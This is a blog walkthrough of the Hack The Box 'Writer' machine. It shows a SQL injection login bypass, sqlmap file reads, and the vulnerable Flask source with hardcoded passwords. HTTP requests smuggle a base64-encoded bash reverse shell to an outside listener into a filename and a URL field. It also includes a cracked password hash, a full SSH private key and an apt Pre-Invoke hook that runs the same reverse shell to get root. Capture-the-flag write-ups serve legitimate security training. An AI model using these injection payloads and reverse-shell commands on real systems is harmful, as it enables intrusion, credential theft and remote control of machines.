Open in app

Sign in

Write

Sign in

Writer Hack the Box Write-up| Writer hack the Box Walkthrough

FreakyDodo
14 min readDec 16, 2021

--

Hey Hackers !!!

In this blog, We will cover the Writer HTB challenge it is an medium level linux based machine. It is similar to most of the real life vulnerabilities. You will get lots of real life bug hunting and foothold lessons, which includes Enumeration, SQL Injection, Command injection, Tools like Hash cat and many more.

So, Let’s began with initial reconissance.

Recon

1# Nmap 7.80 scan initiated Sat Aug  7 14:38:25 2021 as: nmap -sS -sV -sC -oN nmap 10.10.11.101
 2Nmap scan report for writer.htb (10.10.11.101)
 3Host is up (0.33s latency).
 4Not shown: 996 closed ports
 5PORT    STATE SERVICE     VERSION
 622/tcp  open  ssh         OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 780/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
 8|_http-server-header: Apache/2.4.41 (Ubuntu)
 9|_http-title: Story Bank | Writer.HTB
10139/tcp open  netbios-ssn Samba smbd 4.6.2
11445/tcp open  netbios-ssn Samba smbd 4.6.2
12Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
13
14Host script results:
15|_clock-skew: 57s
16|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
17| smb2-security-mode: 
18|   2.02: 
19|_    Message signing enabled but not required
20| smb2-time: 
21|   date: 2021-08-07T06:39:40
22|_  start_date: N/A
23
24# Nmap 7.80 scan initiated Sat Aug  7 14:41:42 2021 as: nmap -sU -sV -sC -p 137 -oN nmap_udp 10.10.11.101
25Nmap scan report for writer.htb (10.10.11.101)
26Host is up (0.39s latency).
27
28PORT    STATE SERVICE    VERSION
29137/udp open  netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
30Service Info: Host: WRITER
31
32Host script results:
33|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
34
35Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
36# Nmap done at Sat Aug  7 14:41:44 2021 -- 1 IP address (1 host up) scanned in 2.16 seconds

BASH

1/etc/hosts
210.10.11.101    writer.htb

wfuzz -w /usr/share/dirb/wordlists/big.txt -u http://writer.htb/FUZZ --hc 404 -t 200

Got Web Shell

admin ' or '1'='1

1POST /administrative HTTP/1.1
 2Host: writer.htb
 3User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 6Accept-Encoding: gzip, deflate
 7Content-Type: application/x-www-form-urlencoded
 8Content-Length: 18
 9Origin: http://writer.htb
10Connection: close
11Referer: http://writer.htb/administrative
12Upgrade-Insecure-Requests: 1
13
14uname=demo&password=demo

HTTP

/etc/apache2/sites-enabled/000-default.conf

sqlmap -r res.txt --file-read=/etc/apache2/sites-enabled/000-default.conf

1# Virtual host configuration for writer.htb domain
 2<VirtualHost *:80>
 3        ServerName writer.htb
 4        ServerAdmin admin@writer.htb
 5        WSGIScriptAlias / /var/www/writer.htb/writer.wsgi
 6        <Directory /var/www/writer.htb>
 7                Order allow,deny
 8                Allow from all
 9        </Directory>
10        Alias /static /var/www/writer.htb/writer/static
11        <Directory /var/www/writer.htb/writer/static/>
12                Order allow,deny
13                Allow from all
14        </Directory>
15        ErrorLog ${APACHE_LOG_DIR}/error.log
16        LogLevel warn
17        CustomLog ${APACHE_LOG_DIR}/access.log combined
18</VirtualHost>
19
20# Virtual host configuration for dev.writer.htb subdomain
21# Will enable configuration after completing backend development
22# Listen 8080
23#<VirtualHost 127.0.0.1:8080>
24#       ServerName dev.writer.htb
25#       ServerAdmin admin@writer.htb
26#
27        # Collect static for the writer2_project/writer_web/templates
28#       Alias /static /var/www/writer2_project/static
29#       <Directory /var/www/writer2_project/static>
30#               Require all granted
31#       </Directory>
32#
33#       <Directory /var/www/writer2_project/writerv2>
34#               <Files wsgi.py>
35#                       Require all granted
36#               </Files>
37#       </Directory>
38#
39#       WSGIDaemonProcess writer2_project python-path=/var/www/writer2_project python-home=/var/www/writer2_project/writer2env
40#       WSGIProcessGroup writer2_project
41#       WSGIScriptAlias / /var/www/writer2_project/writerv2/wsgi.py
42#        ErrorLog ${APACHE_LOG_DIR}/error.log
43#        LogLevel warn
44#        CustomLog ${APACHE_LOG_DIR}/access.log combined
45#
46#</VirtualHost>
47

/var/www/writer.htb/writer/__init__.py

1from flask import Flask, session, redirect, url_for, request, render_template
  2from mysql.connector import errorcode
  3import mysql.connector
  4import urllib.request
  5import os
  6import PIL
  7from PIL import Image, UnidentifiedImageError
  8import hashlib
  9
 10app = Flask(__name__,static_url_path='',static_folder='static',template_folder='templates')
 11
 12#Define connection for database
 13def connections():
 14    try:
 15        connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer')
 16        return connector
 17    except mysql.connector.Error as err:
 18        if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:
 19            return ("Something is wrong with your db user name or password!")
 20        elif err.errno == errorcode.ER_BAD_DB_ERROR:
 21            return ("Database does not exist")
 22        else:
 23            return ("Another exception, returning!")
 24    else:
 25        print ('Connection to DB is ready!')
 26
 27#Define homepage
 28@app.route('/')
 29def home_page():
 30    try:
 31        connector = connections()
 32    except mysql.connector.Error as err:
 33            return ("Database error")
 34    cursor = connector.cursor()
 35    sql_command = "SELECT * FROM stories;"
 36    cursor.execute(sql_command)
 37    results = cursor.fetchall()
 38    return render_template('blog/blog.html', results=results)
 39
 40#Define about page
 41@app.route('/about')
 42def about():
 43    return render_template('blog/about.html')
 44
 45#Define contact page
 46@app.route('/contact')
 47def contact():
 48    return render_template('blog/contact.html')
 49
 50#Define blog posts
 51@app.route('/blog/post/<id>', methods=['GET'])
 52def blog_post(id):
 53    try:
 54        connector = connections()
 55    except mysql.connector.Error as err:
 56            return ("Database error")
 57    cursor = connector.cursor()
 58    cursor.execute("SELECT * FROM stories WHERE id = %(id)s;", {'id': id})
 59    results = cursor.fetchall()
 60    sql_command = "SELECT * FROM stories;"
 61    cursor.execute(sql_command)
 62    stories = cursor.fetchall()
 63    return render_template('blog/blog-single.html', results=results, stories=stories)
 64
 65#Define dashboard for authenticated users
 66@app.route('/dashboard')
 67def dashboard():
 68    if not ('user' in session):
 69        return redirect('/')
 70    return render_template('dashboard.html')
 71
 72#Define stories page for dashboard and edit/delete pages
 73@app.route('/dashboard/stories')
 74def stories():
 75    if not ('user' in session):
 76        return redirect('/')
 77    try:
 78        connector = connections()
 79    except mysql.connector.Error as err:
 80            return ("Database error")
 81    cursor = connector.cursor()
 82    sql_command = "Select * From stories;"
 83    cursor.execute(sql_command)
 84    results = cursor.fetchall()
 85    return render_template('stories.html', results=results)
 86
 87@app.route('/dashboard/stories/add', methods=['GET', 'POST'])
 88def add_story():
 89    if not ('user' in session):
 90        return redirect('/')
 91    try:
 92        connector = connections()
 93    except mysql.connector.Error as err:
 94            return ("Database error")
 95    if request.method == "POST":
 96        if request.files['image']:
 97            image = request.files['image']
 98            if ".jpg" in image.filename:
 99                path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename)
100                image.save(path)
101                image = "/img/{}".format(image.filename)
102            else:
103                error = "File extensions must be in .jpg!"
104                return render_template('add.html', error=error)
105
106        if request.form.get('image_url'):
107            image_url = request.form.get('image_url')
108            if ".jpg" in image_url:
109                try:
110                    local_filename, headers = urllib.request.urlretrieve(image_url)
111                    os.system("mv {} {}.jpg".format(local_filename, local_filename))
112                    image = "{}.jpg".format(local_filename)
113                    try:
114                        im = Image.open(image) 
115                        im.verify()
116                        im.close()
117                        image = image.replace('/tmp/','')
118                        os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
119                        image = "/img/{}".format(image)
120                    except PIL.UnidentifiedImageError:
121                        os.system("rm {}".format(image))
122                        error = "Not a valid image file!"
123                        return render_template('add.html', error=error)
124                except:
125                    error = "Issue uploading picture"
126                    return render_template('add.html', error=error)
127            else:
128                error = "File extensions must be in .jpg!"
129                return render_template('add.html', error=error)
130        author = request.form.get('author')
131        title = request.form.get('title')
132        tagline = request.form.get('tagline')
133        content = request.form.get('content')
134        cursor = connector.cursor()
135        cursor.execute("INSERT INTO stories VALUES (NULL,%(author)s,%(title)s,%(tagline)s,%(content)s,'Published',now(),%(image)s);", {'author':author,'title': title,'tagline': tagline,'content': content, 'image':image })
136        result = connector.commit()
137        return redirect('/dashboard/stories')
138    else:
139        return render_template('add.html')
140
141@app.route('/dashboard/stories/edit/<id>', methods=['GET', 'POST'])
142def edit_story(id):
143    if not ('user' in session):
144        return redirect('/')
145    try:
146        connector = connections()
147    except mysql.connector.Error as err:
148            return ("Database error")
149    if request.method == "POST":
150        cursor = connector.cursor()
151        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
152        results = cursor.fetchall()
153        if request.files['image']:
154            image = request.files['image']
155            if ".jpg" in image.filename:
156                path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename)
157                image.save(path)
158                image = "/img/{}".format(image.filename)
159                cursor = connector.cursor()
160                cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
161                result = connector.commit()
162            else:
163                error = "File extensions must be in .jpg!"
164                return render_template('edit.html', error=error, results=results, id=id)
165        if request.form.get('image_url'):
166            image_url = request.form.get('image_url')
167            if ".jpg" in image_url:
168                try:
169                    local_filename, headers = urllib.request.urlretrieve(image_url)
170                    os.system("mv {} {}.jpg".format(local_filename, local_filename))
171                    image = "{}.jpg".format(local_filename)
172                    try:
173                        im = Image.open(image) 
174                        im.verify()
175                        im.close()
176                        image = image.replace('/tmp/','')
177                        os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
178                        image = "/img/{}".format(image)
179                        cursor = connector.cursor()
180                        cursor.execute("UPDATE stories SET image = %(image)s WHERE id = %(id)s", {'image':image, 'id':id})
181                        result = connector.commit()
182
183                    except PIL.UnidentifiedImageError:
184                        os.system("rm {}".format(image))
185                        error = "Not a valid image file!"
186                        return render_template('edit.html', error=error, results=results, id=id)
187                except:
188                    error = "Issue uploading picture"
189                    return render_template('edit.html', error=error, results=results, id=id)
190            else:
191                error = "File extensions must be in .jpg!"
192                return render_template('edit.html', error=error, results=results, id=id)
193        title = request.form.get('title')
194        tagline = request.form.get('tagline')
195        content = request.form.get('content')
196        cursor = connector.cursor()
197        cursor.execute("UPDATE stories SET title = %(title)s, tagline = %(tagline)s, content = %(content)s WHERE id = %(id)s", {'title':title, 'tagline':tagline, 'content':content, 'id': id})
198        result = connector.commit()
199        return redirect('/dashboard/stories')
200
201    else:
202        cursor = connector.cursor()
203        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
204        results = cursor.fetchall()
205        return render_template('edit.html', results=results, id=id)
206
207@app.route('/dashboard/stories/delete/<id>', methods=['GET', 'POST'])
208def delete_story(id):
209    if not ('user' in session):
210        return redirect('/')
211    try:
212        connector = connections()
213    except mysql.connector.Error as err:
214            return ("Database error")
215    if request.method == "POST":
216        cursor = connector.cursor()
217        cursor.execute("DELETE FROM stories WHERE id = %(id)s;", {'id': id})
218        result = connector.commit()
219        return redirect('/dashboard/stories')
220    else:
221        cursor = connector.cursor()
222        cursor.execute("SELECT * FROM stories where id = %(id)s;", {'id': id})
223        results = cursor.fetchall()
224        return render_template('delete.html', results=results, id=id)
225
226#Define user page for dashboard
227@app.route('/dashboard/users')
228def users():
229    if not ('user' in session):
230        return redirect('/')
231    try:
232        connector = connections()
233    except mysql.connector.Error as err:
234        return "Database Error"
235    cursor = connector.cursor()
236    sql_command = "SELECT * FROM users;"
237    cursor.execute(sql_command)
238    results = cursor.fetchall()
239    return render_template('users.html', results=results)
240
241#Define settings page
242@app.route('/dashboard/settings', methods=['GET'])
243def settings():
244    if not ('user' in session):
245        return redirect('/')
246    try:
247        connector = connections()
248    except mysql.connector.Error as err:
249        return "Database Error!"
250    cursor = connector.cursor()
251    sql_command = "SELECT * FROM site WHERE id = 1"
252    cursor.execute(sql_command)
253    results = cursor.fetchall()
254    return render_template('settings.html', results=results)
255
256#Define authentication mechanism
257@app.route('/administrative', methods=['POST', 'GET'])
258def login_page():
259    if ('user' in session):
260        return redirect('/dashboard')
261    if request.method == "POST":
262        username = request.form.get('uname')
263        password = request.form.get('password')
264        password = hashlib.md5(password.encode('utf-8')).hexdigest()
265        try:
266            connector = connections()
267        except mysql.connector.Error as err:
268            return ("Database error")
269        try:
270            cursor = connector.cursor()
271            sql_command = "Select * From users Where username = '%s' And password = '%s'" % (username, password)
272            cursor.execute(sql_command)
273            results = cursor.fetchall()
274            for result in results:
275                print("Got result")
276            if result and len(result) != 0:
277                session['user'] = username
278                return render_template('success.html', results=results)
279            else:
280                error = "Incorrect credentials supplied"
281                return render_template('login.html', error=error)
282        except:
283            error = "Incorrect credentials supplied"
284            return render_template('login.html', error=error)
285    else:
286        return render_template('login.html')
287
288@app.route("/logout")
289def logout():
290    if not ('user' in session):
291        return redirect('/')
292    session.pop('user')
293    return redirect('/')
294
295if __name__ == '__main__':
296   app.run("0.0.0.0")

PYTHON

1        if request.form.get('image_url'):
 2            image_url = request.form.get('image_url')
 3            if ".jpg" in image_url:
 4                try:
 5                    local_filename, headers = urllib.request.urlretrieve(image_url)
 6                    os.system("mv {} {}.jpg".format(local_filename, local_filename))
 7                    image = "{}.jpg".format(local_filename)
 8                    try:
 9                        im = Image.open(image) 
10                        im.verify()
11                        im.close()
12                        image = image.replace('/tmp/','')
13                        os.system("mv /tmp/{} /var/www/writer.htb/writer/static/img/{}".format(image, image))
14                        image = "/img/{}".format(image)
15                    except PIL.UnidentifiedImageError:
16                        os.system("rm {}".format(image))
17                        error = "Not a valid image file!"
18                        return render_template('add.html', error=error)
19                except:
20                    error = "Issue uploading picture"
21                    return render_template('add.html', error=error)
22            else:
23                error = "File extensions must be in .jpg!"
24                return render_template('add.html', error=error)

PYTHON

1POST /dashboard/stories/add HTTP/1.1
 2Host: writer.htb
 3User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 6Accept-Encoding: gzip, deflate
 7Content-Type: multipart/form-data; boundary=---------------------------4229921975180160461559477084
 8Content-Length: 905
 9Origin: http://writer.htb
10Connection: close
11Referer: http://writer.htb/dashboard/stories/add
12Cookie: session=eyJ1c2VyIjoiYWRtaW4nIC0tIC0ifQ.YRZmJQ.N6M7slyxhOtSWldWbognlVjbwdo
13Upgrade-Insecure-Requests: 1
14
15-----------------------------4229921975180160461559477084
16Content-Disposition: form-data; name="author"
17
18hack
19-----------------------------4229921975180160461559477084
20Content-Disposition: form-data; name="title"
21
22hack
23-----------------------------4229921975180160461559477084
24Content-Disposition: form-data; name="tagline"
25
26hack
27-----------------------------4229921975180160461559477084
28Content-Disposition: form-data; name="image"; filename="123.jpg;`echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash`"
29Content-Type: image/jpeg
30
31
32-----------------------------4229921975180160461559477084
33Content-Disposition: form-data; name="image_url"
34
35
36-----------------------------4229921975180160461559477084
37Content-Disposition: form-data; name="content"
38
39asdasdasdasd
40-----------------------------4229921975180160461559477084--

HTTP

1POST /dashboard/stories/add HTTP/1.1
 2Host: writer.htb
 3User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
 4Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 5Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
 6Accept-Encoding: gzip, deflate
 7Content-Type: multipart/form-data; boundary=---------------------------4229921975180160461559477084
 8Content-Length: 959
 9Origin: http://writer.htb
10Connection: close
11Referer: http://writer.htb/dashboard/stories/add
12Cookie: session=eyJ1c2VyIjoiYWRtaW4nIC0tIC0ifQ.YRZmJQ.N6M7slyxhOtSWldWbognlVjbwdo
13Upgrade-Insecure-Requests: 1
14
15-----------------------------4229921975180160461559477084
16Content-Disposition: form-data; name="author"
17
18hack
19-----------------------------4229921975180160461559477084
20Content-Disposition: form-data; name="title"
21
22hack
23-----------------------------4229921975180160461559477084
24Content-Disposition: form-data; name="tagline"
25
26hack
27-----------------------------4229921975180160461559477084
28Content-Disposition: form-data; name="image"; filename="123.jpg"
29Content-Type: image/jpeg
30
31
32-----------------------------4229921975180160461559477084
33Content-Disposition: form-data; name="image_url"
34
35file:///var/www/writer.htb/writer/static/img/123.jpg;`echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash`
36
37-----------------------------4229921975180160461559477084
38Content-Disposition: form-data; name="content"
39
40asdasdasdasd
41-----------------------------4229921975180160461559477084--

HTTP

1www-data@writer:/$ ls /home
 2ls /home
 3john
 4kyle
 5www-data@writer:/$ ls -al /home/kyle
 6ls -al /home/kyle
 7total 28
 8drwxr-xr-x 3 kyle kyle 4096 Aug  5 09:59 .
 9drwxr-xr-x 4 root root 4096 Jul  9 10:59 ..
10lrwxrwxrwx 1 root root    9 May 18 18:03 .bash_history -> /dev/null
11-rw-r--r-- 1 kyle kyle  220 Feb 25  2020 .bash_logout
12-rw-r--r-- 1 kyle kyle 3771 Feb 25  2020 .bashrc
13drwx------ 2 kyle kyle 4096 Jul 28 09:03 .cache
14-rw-r--r-- 1 kyle kyle  807 Feb 25  2020 .profile
15-r-------- 1 kyle kyle   33 Aug 14 08:32 user.txt
16www-data@writer:/var/www/writer2_project/writerv2$ ls -al                                                                                                                                                          
17ls -al                                                                                                                                                                                                             
18total 24                                                                                                                                                                                                           
19dr-xr-sr-x 3 www-data smbgroup 4096 May 19 12:32 .                                                                                                                                                                 
20drwxrws--- 6 www-data smbgroup 4096 Aug  2 06:52 ..                                                                                                                                                                
21-r-xr-s--- 1 www-data smbgroup    0 Aug 14 08:56 __init__.py                                                                                                                                                       
22dr-xr-s--- 2 www-data smbgroup 4096 May 19 21:06 __pycache__                                                                                                                                                       
23-r-xr-s--- 1 www-data smbgroup 3307 Aug 14 08:56 settings.py                                                                                                                                                       
24-r-xr-s--- 1 www-data smbgroup  817 Aug 14 08:56 urls.py                                                                                                                                                           
25-r-xr-s--- 1 www-data smbgroup  401 Aug 14 08:56 wsgi.py

BASH

1DATABASES = {                                                                                                                                                                                                      
2    'default': {                                                                                                                                                                                                   
3        'ENGINE': 'django.db.backends.mysql',                                                                                                                                                                      
4        'OPTIONS': {                                                                                                                                                                                               
5            'read_default_file': '/etc/mysql/my.cnf',                                                                                                                                                              
6        },
7    }
8}1[client]
2database = dev
3user = djangouser
4password = DjangoSuperPassword
5default-character-set = utf81MariaDB [dev]> select username,password from auth_user;
2select username,password from auth_user;
3+----------+------------------------------------------------------------------------------------------+
4| username | password                                                                                 |
5+----------+------------------------------------------------------------------------------------------+
6| kyle     | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= |
7+----------+------------------------------------------------------------------------------------------+
81 row in set (0.001 sec)
1PS E:\tools\hashcat-5.1.0> hashcat64.exe .\hash.txt .\rockyou.txt -m 10000 --show
2pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A=:marcoantonio

BASH

1kyle@writer:~$ ls -al 
 2total 28
 3drwxr-xr-x 3 kyle kyle 4096 Aug  5 09:59 .
 4drwxr-xr-x 4 root root 4096 Jul  9 10:59 ..
 5lrwxrwxrwx 1 root root    9 May 18 18:03 .bash_history -> /dev/null
 6-rw-r--r-- 1 kyle kyle  220 Feb 25  2020 .bash_logout
 7-rw-r--r-- 1 kyle kyle 3771 Feb 25  2020 .bashrc
 8drwx------ 2 kyle kyle 4096 Jul 28 09:03 .cache
 9-rw-r--r-- 1 kyle kyle  807 Feb 25  2020 .profile
10-r-------- 1 kyle kyle   33 Aug 13 12:20 user.txt
11kyle@writer:~$ cat user.txt
12a90cca8b34ddad84ad5f93fae43fe8d1

BASH

Privilege escalation

1kyle@writer:/var/www/writer2_project$ id
2uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup)
3kyle@writer:~$ find / -group filter -type f 2>/dev/null
4/etc/postfix/disclaimer

BASH

./NATBypass -tran 2255 127.0.0.1:25

sendmail.py

1from email.mime.multipart import MIMEMultipart
 2from email.mime.text import MIMEText
 3import smtplib
 4import sys
 5
 6lhost = "10.10.14.24"
 7lport = 10086
 8rhost = "10.10.11.101"
 9rport = 2255 # 489,587
10
11# create message object instance
12msg = MIMEMultipart()
13
14
15# setup the parameters of the message
16password = "" 
17msg['From'] = "kyle@write.htb"
18msg['To'] = "john@write.htb"
19msg['Subject'] = "This is not a drill!"
20
21# payload 
22message = ('asdasdasd')
23
24print("[*] Payload is generated : %s" % message)
25
26msg.attach(MIMEText(message, 'plain'))
27server = smtplib.SMTP(host=rhost,port=rport)
28
29if server.noop()[0] != 250:
30    print("[-]Connection Error")
31    exit()
32
33server.starttls()
34
35# Uncomment if log-in with authencation
36# server.login(msg['From'], password)
37
38server.sendmail(msg['From'], msg['To'], msg.as_string())
39server.quit()
40
41print("[***]successfully sent email to %s:" % (msg['To']))

PYTHON

1john@writer:/home/john/.ssh$ ls -al
2ls -al
3total 20
4drwx------ 2 john john 4096 Jul  9 12:29 .
5drwxr-xr-x 4 john john 4096 Aug  5 09:56 ..
6-rw-r--r-- 1 john john  565 Jul  9 12:29 authorized_keys
7-rw------- 1 john john 2602 Jul  9 12:29 id_rsa
8-rw-r--r-- 1 john john  565 Jul  9 12:29 id_rsa.pub
9john@writer:/home/john/.ssh$

BASH

id_rsa

1-----BEGIN OPENSSH PRIVATE KEY-----
 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
38-----END OPENSSH PRIVATE KEY-----

TEXT

1echo 'apt::Update::Pre-Invoke {"echo L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjQvMTAwODYgMD4mMSI= | base64 -d | bash"};'> pwn

BASH

Now you know what should be done, grab a root and let us know where you able to or not in the comment box.

Keep coming for more.

Happy Hacking!!!!

Hackathons
Hackthebox
Hackthebox Writeup
Hackthebox Walkthrough
Harshitdodia653

--

--

FreakyDodo
FreakyDodo

Written by FreakyDodo

142 Followers
4 Following

Hey Hackers !! I am Harshit Dodia aka Freaky Dodo , I am a student of Information Technology and Ethical hacking.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams